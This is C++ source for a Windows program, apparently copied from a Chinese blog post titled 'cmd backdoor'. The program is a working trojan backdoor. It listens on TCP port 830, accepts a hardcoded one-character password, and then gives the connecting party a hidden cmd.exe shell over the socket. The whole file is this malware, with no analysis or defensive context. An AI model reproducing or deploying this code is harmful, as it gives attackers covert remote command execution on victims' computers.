// door.cpp : 定义控制台应用程序的入口点。
//
#include "stdafx.h"
#include <stdio.h>
#include "stdafx.h"
#include <winsock2.h>
#pragma comment(lib,"Ws2_32")
void door();
int main(int argc, char* argv[])
{
door();
return 0;
}
int port=830;
char pass[] = "j";
char g_helpmess[] = ""
"? --help\r\n"
"shell --get cmd shell\r\nquit --quit,can connect again\r\nexit --backdoor exit\r\n";
int cmdshell(SOCKET clientFD)
{
STARTUPINFO si;
ZeroMemory(&si,sizeof(si));
si.dwFlags = STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;
si.wShowWindow = SW_HIDE;
si.hStdInput = si.hStdOutput = si.hStdError = (void *)clientFD;
char cmdLine[] = "cmd";
PROCESS_INFORMATION ProcessInformation;
int ret;
ret=CreateProcess(NULL,cmdLine,NULL,NULL,1,0,NULL,NULL,&si,&ProcessInformation);
WaitForSingleObject(ProcessInformation.hProcess, INFINITE);
TerminateProcess(ProcessInformation.hProcess, 0);
CloseHandle(ProcessInformation.hProcess);
return 1;
}
void door()
{
// bool statulogin=false;
bool passok=false;
WSADATA ws;
SOCKET listenFD;
char Buff[1024],cmd[1024];
int ret;
unsigned long lBytesRead;
WSAStartup(MAKEWORD(2,2),&ws);
//建立socket
//listenFD = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
listenFD = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0);
struct sockaddr_in server;
server.sin_family = AF_INET;
server.sin_port = htons(port);
server.sin_addr.s_addr=ADDR_ANY;
ret=bind(listenFD,(sockaddr *)&server,sizeof(server));
ret=listen(listenFD,1);
int iAddrSize = sizeof(server);
ag:
SOCKET clientFD=accept(listenFD,(sockaddr *)&server,&iAddrSize);
// send(clientFD,"",sizeof(""),0);
while(1)
{
ZeroMemory(cmd,1024);
lBytesRead = 0;
while(lBytesRead<256)
{
if(recv(clientFD,Buff,1,0)==SOCKET_ERROR)
{
closesocket(clientFD);
goto ag;
}
cmd[lBytesRead]=Buff[0];
if(Buff[0]==0xa || Buff[0]==0xd)
{
cmd[lBytesRead]=0;
break;
}
lBytesRead++;
}
//判断密码
if(strcmp(cmd,pass) == 0 ){ passok=true;}
if(passok==true)
{}
else
{
closesocket(clientFD);
goto ag;
} //如果密码错误就断开
//帮助信息
if(strcmp(cmd,"?") == 0 && passok==true)
{
send(clientFD,g_helpmess,sizeof(g_helpmess),0);
}
//得到cmd shell
if(strcmp(cmd,"shell")==0 && passok==true)
{
cmdshell(clientFD);
send(clientFD,"Shell OK\n\r",sizeof("Shell OK\n\r"),0);
}
//退出木马,还可再连接
if(strcmp(cmd,"quit")==0 && passok==true)
{
passok=false;
closesocket(clientFD);
goto ag;
}
//木马退出程序
if(strcmp(cmd,"exit")==0 && passok==true)
{
closesocket(clientFD);
closesocket(listenFD);
goto end;
}
if(strlen(cmd) && passok==true)
send(clientFD,"shell>",sizeof("shell>"),0);
Sleep(10);
}
end:
;
// return 0;
}
cmd后门
最新推荐文章于 2024-03-14 14:58:18 发布